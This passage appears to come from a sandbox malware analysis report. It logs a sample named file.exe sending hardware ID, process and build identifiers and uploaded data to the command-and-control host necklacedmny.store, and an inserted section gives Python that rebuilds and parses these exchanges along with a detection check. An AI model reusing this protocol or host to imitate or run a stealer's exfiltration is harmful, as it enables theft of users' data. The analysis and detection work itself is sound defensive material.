Data Ascii: PCDk2UBf4c9xJmStoKSWXmdtavcdlY1nGL3J7uYTxQw2OLaJC3fhzX0jf+Ka6YMffS1q8VfCx2sQs8zl6VCDRyMg5NdGUfbbfyFjo7KjkldnZGb0Ep2DI1vwyPamC8ttPCv621xUpMI0NimnrOnEEWBsafwTlIlnGbbB4+lVgUw2Kv7ZSlnv0noqZKSmpZ1UJCMt+g/a3yM7t8z8pGaIQj8n4JFUGv2dfSMp+OCnmV52bH/4GYiLZhO9zODmVox
2024-10-30 07:22:12 UTC | 1369 | IN | Data Raw: 33 66 39 31 0d 0a 49 50 43 2f 2f 32 45 4a 47 37 74 46 30 50 57 53 71 70 61 65 51 56 47 74 74 62 50 77 5a 6b 49 77 6a 57 2f 44 49 39 71 59 4c 79 32 4d 38 4d 4f 54 62 51 45 57 6d 36 48 6b 68 5a 36 65 32 36 59 4d 66 66 53 31 71 38 56 66 43 78 32 67 54 76 4d 50 75 34 45 47 46 51 79 4d 71 35 4e 56 46 55 4f 6a 54 63 79 4a 6d 70 62 4b 74 6e 45 4e 6c 61 47 72 7a 47 6f 69 43 49 31 76 77 79 50 61 6d 43 38 74 32 42 53 66 6d 77 45 77 57 30 64 35 30 49 57 36 32 34 4c 62 53 53 43 52 71 59 62 31 50 32 6f 52 76 47 4c 6e 4b 34 66 52 5a 68 30 30 6a 4a 2f 2f 59 51 56 58 71 30 6e 45 6a 62 4c 4b 72 70 70 52 65 5a 57 42 67 39 68 4f 61 78 79 31 56 74 39 65 75 76 68 4f 71 51 54 34 79 39 63 41 4a 59 65 66 54 64 43 68 2f 34 4c 2f 6e 68 52 46 6a 59 53 32 6c 56 35 75 4c 62 78 53 2f
Data Ascii: 3f91IPC//2EJG7tF0PWSqpaeQVGttbPwZkIwjW/DI9qYLy2M8MOTbQEWm6HkhZ6e26YMffS1q8VfCx2gTvMPu4EGFQyMq5NVFUOjTcyJmpbKtnENlaGrzGoiCI1vwyPamC8t2BSfmwEwW0d50IW624LbSSCRqYb1P2oRvGLnK4fRZh00jJ//YQVXq0nEjbLKrppReZWBg9hOaxy1Vt9euvhOqQT4y9cAJYefTdCh/4L/nhRFjYS2lV5uLbxS/
2024-10-30 07:22:12 UTC | 1369 | IN | Data Raw: 53 41 52 7a 55 6b 39 74 78 41 57 75 72 55 64 69 64 6c 70 37 4b 6b 6d 56 6c 75 5a 47 6a 78 47 70 6d 56 59 42 54 77 67 61 37 68 53 38 73 55 63 51 66 46 35 6d 67 55 2b 35 4e 6a 62 32 36 73 34 50 48 63 55 47 78 71 59 2f 6b 46 6c 4a 56 74 45 72 44 4a 35 75 35 55 68 30 49 2f 4d 76 37 51 53 31 72 72 31 58 4d 72 61 4b 53 6b 70 5a 73 52 4b 69 31 71 35 56 66 43 78 30 73 57 71 74 57 73 79 46 69 4c 53 79 45 32 37 5a 46 55 47 76 32 64 66 53 4d 70 2b 4f 43 74 6c 31 74 74 62 6d 54 35 47 70 71 4f 62 42 79 34 77 75 62 30 55 6f 46 65 4e 53 58 33 33 6b 46 51 37 4e 46 31 49 32 32 79 71 2b 6e 53 45 57 4e 31 4c 61 56 58 75 6f 78 31 4e 71 4c 64 72 76 6b 64 6b 67 77 32 4c 4c 61 4a 43 31 33 6f 33 48 73 6c 62 36 75 6c 70 4a 78 55 62 6d 70 68 2f 52 65 5a 67 57 55 59 75 4d 66 69 36
Data Ascii: SARzUk9txAWurUdidlp7KkmVluZGjxGpmVYBTwga7hS8sUcQfF5mgU+5Njb26s4PHcUGxqY/kFlJVtErDJ5u5Uh0I/Mv7QS1rr1XMraKSkpZsRKi1q5VfCx0sWqtWsyFiLSyE27ZFUGv2dfSMp+OCtl1ttbmT5GpqObBy4wub0UoFeNSX33kFQ7NF1I22yq+nSEWN1LaVXuox1NqLdrvkdkgw2LLaJC13o3Hslb6ulpJxUbmph/ReZgWUYuMfi6
2024-10-30 07:22:12 UTC | 1369 | IN | Data Raw: 30 4b 50 33 58 52 56 58 69 30 58 64 76 4a 2b 43 6e 73 64 77 4a 4a 45 70 33 38 42 47 4e 6c 6c 59 53 73 4a 36 75 2b 52 32 53 44 44 59 73 74 6f 6b 4c 57 65 6a 58 64 79 70 74 71 4b 65 71 6e 56 31 67 59 47 44 35 48 70 36 43 63 51 65 32 77 65 37 70 58 59 52 41 49 79 37 7a 30 55 63 55 71 70 31 39 4e 79 6e 34 34 4a 69 4c 55 53 52 79 49 2b 52 58 6e 59 73 6a 54 66 44 41 34 2f 52 66 68 45 77 77 49 2f 4c 61 54 46 4c 69 33 48 6b 71 61 71 57 6d 71 4a 78 64 62 6d 70 6c 39 78 6d 58 67 57 63 54 74 6f 2b 67 70 6c 53 54 44 47 6c 67 78 4e 78 46 58 65 66 62 64 7a 6c 42 6b 65 43 32 30 6b 67 6b 61 6d 47 39 54 39 71 44 61 42 32 38 79 75 62 6a 55 6f 4e 47 4f 53 2f 35 77 30 70 62 37 64 70 78 49 6d 61 75 70 61 65 4f 56 6d 39 6d 5a 66 51 5a 6e 4d 63 74 56 62 66 58 72 72 34 54 76 55
Data Ascii: 0KP3XRVXi0XdvJ+CnsdwJJEp38BGNllYSsJ6u+R2SDDYstokLWejXdyptqKeqnV1gYGD5Hp6CcQe2we7pXYRAIy7z0UcUqp19Nyn44JiLUSRyI+RXnYsjTfDA4/RfhEwwI/LaTFLi3HkqaqWmqJxdbmpl9xmXgWcTto+gplSTDGlgxNxFXefbdzlBkeC20kgkamG9T9qDaB28yubjUoNGOS/5w0pb7dpxImaupaeOVm9mZfQZnMctVbfXrr4TvU
2024-10-30 07:22:12 UTC | 1369 | IN | Data Raw: 32 55 39 61 39 74 78 31 62 79 66 67 70 37 48 63 43 53 52 63 65 2f 6f 51 6c 63 56 4b 45 71 76 4f 35 4f 56 59 68 77 77 75 62 75 2b 52 54 46 69 6b 68 54 6f 69 5a 61 32 6b 75 35 42 52 5a 47 52 71 39 77 57 56 69 47 34 57 73 4d 72 38 35 30 47 45 52 7a 51 6a 38 74 35 45 57 4f 7a 58 4f 6d 45 70 70 37 6a 70 78 42 46 49 62 6e 7a 33 56 62 32 64 64 52 4b 38 33 75 58 72 58 38 74 54 66 7a 6d 32 31 6b 63 55 76 4a 31 36 4c 6d 53 79 70 61 69 57 57 32 6c 6c 59 76 67 53 6c 59 4e 6e 48 72 37 64 34 4f 6c 54 6a 55 63 77 4a 66 58 61 51 56 72 74 7a 7a 70 68 4b 61 65 34 36 63 51 52 54 6e 5a 73 38 42 76 59 71 57 67 44 74 34 33 50 36 46 69 4d 51 43 64 67 36 5a 39 53 46 4f 50 52 4f 6e 63 70 71 61 36 6c 6e 31 5a 73 5a 57 6a 39 48 4a 71 49 61 52 75 33 33 65 54 71 57 5a 6c 44 4d 69 33
Data Ascii: 2U9a9tx1byfgp7HcCSRce/oQlcVKEqvO5OVYhwwubu+RTFikhToiZa2ku5BRZGRq9wWViG4WsMr850GERzQj8t5EWOzXOmEpp7jpxBFIbnz3Vb2ddRK83uXrX8tTfzm21kcUvJ16LmSypaiWW2llYvgSlYNnHr7d4OlTjUcwJfXaQVrtzzphKae46cQRTnZs8BvYqWgDt43P6FiMQCdg6Z9SFOPROncpqa6ln1ZsZWj9HJqIaRu33eTqWZlDMi3
2024-10-30 07:22:12 UTC | 1369 | IN | Data Raw: 76 32 64 66 53 4d 70 2b 4f 43 70 6d 46 31 6e 61 6d 50 79 47 70 57 41 61 42 71 36 77 66 7a 70 56 6f 4e 41 4f 53 33 6b 32 30 46 47 37 64 52 33 49 57 47 79 6f 2b 6e 53 45 57 4e 31 4c 61 56 58 71 49 31 67 47 61 62 43 34 61 5a 4d 78 56 56 78 4a 2f 71 52 45 78 54 32 7a 33 6f 6b 61 61 65 75 75 35 31 5a 61 32 64 74 2b 78 79 51 68 47 6f 52 76 73 62 6f 35 31 36 4b 54 54 45 6c 39 74 68 5a 57 61 53 54 4f 69 68 78 34 50 6a 70 71 31 31 76 58 47 37 72 56 34 58 4a 65 6c 57 33 77 36 36 2b 45 34 70 65 50 43 6a 79 30 55 5a 53 37 39 78 37 4c 47 6d 67 6f 36 6d 5a 57 6d 74 72 61 76 41 64 6b 34 35 78 48 62 54 64 37 75 70 58 79 77 4a 78 4a 2b 36 52 45 78 54 55 33 6e 45 6a 61 61 32 31 36 59 4d 66 66 53 31 71 38 56 66 43 78 32 73 65 75 38 6e 6c 35 56 43 46 52 7a 73 76 2b 64 74 4e
Data Ascii: v2dfSMp+OCpmF1namPyGpWAaBq6wfzpVoNAOS3k20FG7dR3IWGyo+nSEWN1LaVXqI1gGabC4aZMxVVxJ/qRExT2z3okaaeuu51Za2dt+xyQhGoRvsbo516KTTEl9thZWaSTOihx4Pjpq11vXG7rV4XJelW3w66+E4pePCjy0UZS79x7LGmgo6mZWmtravAdk45xHbTd7upXywJxJ+6RExTU3nEjaa216YMffS1q8VfCx2seu8nl5VCFRzsv+dtN
2024-10-30 07:22:12 UTC | 1369 | IN | Data Raw: 73 69 59 71 7a 69 71 4a 46 42 59 79 30 6a 76 52 48 61 33 7a 4e 62 38 4d 76 2f 70 67 76 62 48 6d 70 31 70 59 59 62 42 76 75 54 59 32 39 2f 34 50 6a 37 30 68 46 32 4c 54 57 39 55 4a 6d 56 63 52 4f 7a 32 65 32 68 62 62 56 73 4f 69 7a 31 33 55 70 54 70 4a 4d 36 49 43 6e 34 6d 65 6d 66 51 33 59 69 66 4f 73 61 69 6f 41 76 48 61 48 43 34 71 59 64 79 77 41 31 4b 2f 72 55 54 45 53 72 7a 32 6f 6b 5a 62 62 73 72 59 34 52 4b 69 31 38 39 68 69 49 69 57 52 61 6f 64 6e 6a 39 6c 43 4f 53 33 30 6f 35 39 78 48 46 4b 71 64 62 79 52 6c 70 71 32 38 30 30 42 79 62 6e 76 36 57 35 4b 57 62 68 6e 77 38 4b 43 6d 53 38 73 55 63 52 58 31 33 30 56 54 38 73 77 33 44 32 4b 73 6f 36 57 64 56 69 51 6a 4c 66 74 58 77 74 51 74 56 62 54 65 72 72 34 44 32 52 64 6b 63 36 47 42 47 55 75 71 78
Data Ascii: siYqziqJFBYy0jvRHa3zNb8Mv/pgvbHmp1pYYbBvuTY29/4Pj70hF2LTW9UJmVcROz2e2hbbVsOiz13UpTpJM6ICn4memfQ3YifOsaioAvHaHC4qYdywA1K/rUTESrz2okZbbsrY4RKi189hiIiWRaodnj9lCOS30o59xHFKqdbyRlpq2800Bybnv6W5KWbhnw8KCmS8sUcRX130VT8sw3D2Kso6WdViQjLftXwtQtVbTerr4D2Rdkc6GBGUuqx
2024-10-30 07:22:12 UTC | 1369 | IN | Data Raw: 67 2b 50 72 53 45 58 59 74 4e 62 31 51 6c 49 70 69 46 72 37 4d 2f 50 52 56 69 46 6f 79 5a 38 6a 76 62 6c 6e 70 32 48 51 6f 56 35 36 42 6f 34 78 63 61 32 70 54 77 79 43 4c 67 48 4e 58 6c 73 7a 34 35 52 50 46 44 43 6c 67 72 70 46 71 58 76 54 51 64 53 67 70 37 75 43 74 33 41 6b 6b 53 47 44 77 45 70 53 41 49 54 53 36 33 2b 50 70 56 4d 73 43 63 53 79 32 69 51 74 56 37 73 31 33 49 47 37 73 70 37 4f 62 45 53 6f 74 59 37 31 50 32 6f 5a 70 42 62 33 41 36 61 70 56 68 55 4a 78 50 37 6a 49 43 30 4b 6b 68 53 6c 68 4b 62 4c 67 38 64 77 57 61 6d 42 73 2f 68 6d 5a 6c 58 45 54 73 39 6e 74 6f 57 32 31 61 54 77 74 38 39 39 4d 61 74 72 38 63 44 39 6b 72 36 66 72 76 46 5a 79 62 6c 50 44 49 49 75 41 63 31 65 57 7a 50 6a 6c 45 38 55 4d 4b 57 43 75 6b 57 70 65 39 4e 42 31 4b 43
Data Ascii: g+PrSEXYtNb1QlIpiFr7M/PRViFoyZ8jvblnp2HQoV56Bo4xca2pTwyCLgHNXlsz45RPFDClgrpFqXvTQdSgp7uCt3AkkSGDwEpSAITS63+PpVMsCcSy2iQtV7s13IG7sp7ObESotY71P2oZpBb3A6apVhUJxP7jIC0KkhSlhKbLg8dwWamBs/hmZlXETs9ntoW21aTwt899Matr8cD9kr6frvFZyblPDIIuAc1eWzPjlE8UMKWCukWpe9NB1KC


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49713 | 188.114.96.3 | 443 | 1408 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-30 07:22:13 UTC | 284 | OUT | POST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 12864
                                                                      Host: necklacedmny.store
2024-10-30 07:22:13 UTC | 12864 | OUT | Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 46 36 30 31 35 39 38 31 38 39 39 46 45 32 44 34 44 35 31 38 34 33 34 33 35 39 31 30 43 31 37 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"DF6015981899FE2D4D51843435910C17--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
2024-10-30 07:22:14 UTC | 1022 | IN | HTTP/1.1 200 OK
                                                                      Date: Wed, 30 Oct 2024 07:22:14 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=q38r2j4v3mdm106e6b0vdovvga; expires=Sun, 23 Feb 2025 01:08:53 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1sMx41ghXRPNa5b3WWteYFW4gPz8yy6u%2BQhC4137kheFfLo%2Bp3cuRlz6D4POpo%2F9th6Uuu1Q0qL3gDDcexa6sCRo6kQ0YI2ETsrVb%2BXSZa90%2BK10oVbJRI9wef9L0keBDXbYW%2BI%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8da9a72c7d412e79-DFW
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1372&sent=9&recv=18&lost=0&retrans=0&sent_bytes=2845&recv_bytes=13806&delivery_rate=2061209&cwnd=248&unsent_bytes=0&cid=b86c286b291093d3&ts=529&x=0"
2024-10-30 07:22:14 UTC | 23 | IN | Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 0d 0a
Data Ascii: 11ok 173.254.250.78
2024-10-30 07:22:14 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.6 | 49719 | 188.114.96.3 | 443 | 1408 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-30 07:22:14 UTC | 284 | OUT | POST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 15110
                                                                      Host: necklacedmny.store
2024-10-30 07:22:14 UTC | 15110 | OUT | Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 46 36 30 31 35 39 38 31 38 39 39 46 45 32 44 34 44 35 31 38 34 33 34 33 35 39 31 30 43 31 37 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"DF6015981899FE2D4D51843435910C17--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
2024-10-30 07:22:15 UTC | 1027 | IN | HTTP/1.1 200 OK
                                                                      Date: Wed, 30 Oct 2024 07:22:15 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=5ip8g6ptua5qifoksdsh59ppfd; expires=Sun, 23 Feb 2025 01:08:54 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a3ELk40sq1njhEOgbbuHNe9PzEPNbJaIa%2FDUno4t25BAlxanAEAFr%2FuC%2FhE5LbZJhUhdkQ%2Fd1He%2BNDxspEy5gqF6%2B9XVBj%2BC4utxs7kgluspYVi0FtUunxaduY%2B%2FnWgCWNKMxdw%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8da9a7341b93eb27-DFW
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1119&sent=9&recv=20&lost=0&retrans=0&sent_bytes=2844&recv_bytes=16052&delivery_rate=2498705&cwnd=32&unsent_bytes=0&cid=7614aa3a8a8fb9d5&ts=758&x=0"
2024-10-30 07:22:15 UTC | 23 | IN | Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 0d 0a
Data Ascii: 11ok 173.254.250.78
2024-10-30 07:22:15 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0
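The sessions recorded above are one check-in sequence against necklacedmny.store: a `POST /api` with `act=life`, a `POST /api` with `act=recive_message&ver=4.0&lid=4SD0y4--legendaryy&j=` answered with a chunked base64 body, then multipart uploads carrying `hwid`, `pid` and `lid` fields, each answered with `ok` followed by an IPv4 address. The Python below is an added example, not part of the Joe Sandbox report and not the sample's own code. It rebuilds messages in exactly that shape from the values transcribed above (the uploaded part named "file" is a constructed placeholder, because the capture is cut after the lid field and the real part is not visible), de-chunks the replies, extracts the fields, and ends with the shape check a detection engineer would lift from this traffic. Whether the address in `ok 173.254.250.78` is the client's public IP as seen by the server is not stated in the report and is not assumed here.

```python
"""Parser for the C2 exchanges recorded above. Added example, not code from the
Joe Sandbox report or from the sample: splits raw HTTP messages in the captured
shape, de-chunks the replies and extracts the fields sent."""
from urllib.parse import parse_qs
import re

BOUNDARY = "be85de5ipdocierre1"          # boundary seen in the captured uploads

def build_request(body: bytes, ctype: bytes) -> bytes:
    """Request line and headers as the sample sends them (User-Agent omitted)."""
    return (b"POST /api HTTP/1.1\r\nConnection: Keep-Alive\r\nContent-Type: "
            + ctype + b"\r\nContent-Length: " + str(len(body)).encode()
            + b"\r\nHost: necklacedmny.store\r\n\r\n" + body)

def mp_part(name: str, value: bytes) -> bytes:
    """One form-data part in the layout of the captured uploads."""
    return (b'--%s\r\nContent-Disposition: form-data; name="%s"\r\n\r\n%s\r\n'
            % (BOUNDARY.encode(), name.encode(), value))

# Constructed copies of sessions 0, 1 and 2 from the values transcribed above.
# The "file" part is a placeholder: the capture is cut after the lid field, so
# the real name and content of the uploaded part are not visible.
REQ_LIFE = build_request(b"act=life", b"application/x-www-form-urlencoded")
REQ_RECV = build_request(b"act=recive_message&ver=4.0&lid=4SD0y4--legendaryy&j=",
                         b"application/x-www-form-urlencoded")
REQ_UPLOAD = build_request(
    mp_part("hwid", b"DF6015981899FE2D4D51843435910C17") + mp_part("pid", b"2")
    + mp_part("lid", b"4SD0y4--legendaryy") + mp_part("file", b"PK\x03\x04constructed")
    + b"--" + BOUNDARY.encode() + b"--\r\n",
    b"multipart/form-data; boundary=" + BOUNDARY.encode())
RESP_LIFE = b"HTTP/1.1 200 OK\r\nTransfer-Encoding: chunked\r\n\r\n2\r\nok\r\n0\r\n\r\n"
RESP_UPLOAD = (b"HTTP/1.1 200 OK\r\nTransfer-Encoding: chunked\r\n\r\n"
               b"11\r\nok 173.254.250.78\r\n0\r\n\r\n")

def split_message(raw: bytes):
    """(start line, lower-cased header dict, body) of one HTTP message."""
    head, _, body = raw.partition(b"\r\n\r\n")
    start, *hdrs = head.split(b"\r\n")
    headers = {n.strip().lower().decode(): v.strip().decode()
               for n, _, v in (h.partition(b":") for h in hdrs)}
    return start.decode(), headers, body

def dechunk(body: bytes) -> bytes:
    """Reassemble a chunked body (the 2 / ok / 0 framing seen above)."""
    out, pos = b"", 0
    while True:
        nl = body.index(b"\r\n", pos)
        size = int(body[pos:nl].split(b";")[0], 16)   # ignore chunk extensions
        if size == 0:
            return out
        out += body[nl + 2:nl + 2 + size]
        pos = nl + 2 + size + 2                        # past the trailing CRLF

def parse_multipart(body: bytes, boundary: str) -> dict:
    """{field name: raw bytes} for every form-data part."""
    fields = {}
    for part in body.split(b"--" + boundary.encode()):
        part = part[2:] if part.startswith(b"\r\n") else part
        part = part[:-2] if part.endswith(b"\r\n") else part
        if part and part != b"--":                     # skip preamble / closer
            phead, _, pbody = part.partition(b"\r\n\r\n")
            m = re.search(rb'name="([^"]+)"', phead)
            if m:
                fields[m.group(1).decode()] = pbody
    return fields

def parse_request(raw: bytes) -> dict:
    """Method, path, host and form fields of one request."""
    start, headers, body = split_message(raw)
    method, path, _ = start.split(" ", 2)
    ctype = headers.get("content-type", "")
    fields = {}
    if ctype.startswith("application/x-www-form-urlencoded"):
        fields = {k: v[0] for k, v in
                  parse_qs(body.decode(), keep_blank_values=True).items()}
    elif ctype.startswith("multipart/form-data"):
        parts = parse_multipart(body, ctype.split("boundary=", 1)[1])
        fields = {k: v.decode("latin-1") for k, v in parts.items()}
    return {"method": method, "path": path, "host": headers.get("host"),
            "fields": fields}

def parse_response(raw: bytes) -> str:
    """De-chunked reply body as text ("ok", or "ok <ip>" for the uploads)."""
    _, headers, body = split_message(raw)
    if headers.get("transfer-encoding", "").lower() == "chunked":
        body = dechunk(body)
    return body.decode("latin-1")

def matches_c2_shape(info: dict) -> bool:
    """POST /api carrying an act= beacon or an upload keyed by hwid/pid/lid."""
    f = info["fields"]
    return (info["method"], info["path"]) == ("POST", "/api") and (
        "act" in f or {"hwid", "pid", "lid"} <= f.keys())

if __name__ == "__main__":                        # stand-alone run
    print([parse_request(r)["fields"] for r in (REQ_LIFE, REQ_RECV, REQ_UPLOAD)])
    print(parse_response(RESP_LIFE), "|", parse_response(RESP_UPLOAD))
```

`matches_c2_shape` is a content match on what this capture shows, not a signature for the family: a proxy or IDS rule built from it should pair the `POST /api` path with the `act=` body or the `hwid`/`pid`/`lid` part names, since the User-Agent string and the Cloudflare-fronted address are shared with plenty of benign traffic.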


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.6 | 49725 | 188.114.96.3 | 443 | 1408 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-30 07:22:16 UTC | 284 | OUT | POST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 19968
                                                                      Host: necklacedmny.store
2024-10-30 07:22:16 UTC | 15331 | OUT | Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 46 36 30 31 35 39 38 31 38 39 39 46 45 32 44 34 44 35 31 38 34 33 34 33 35 39 31 30 43 31 37 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"DF6015981899FE2D4D51843435910C17--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
2024-10-30 07:22:16 UTC | 4637 | OUT | Data Raw: f0 03 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70
Data Ascii: +?2+?2+?o?Mp5p
2024-10-30 07:22:17 UTC | 1015 | IN | HTTP/1.1 200 OK
                                                                      Date: Wed, 30 Oct 2024 07:22:17 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=11fesbuqaoo5oa2akhcp0irurg; expires=Sun, 23 Feb 2025 01:08:56 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gORtLQhD%2FQjQdKPf0MyFEAcphmo8AZ8S4nGDK41kOsgk3oRhnvIZoQNGs2PTxWoLVeyJIMvo8IIVjNGBdaA1iU0us7LeZMSuU2HFo4XvOCHJVFuF6au9LH1TFE27xNn%2FrzuXFHw%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8da9a73dfcc76b25-DFW
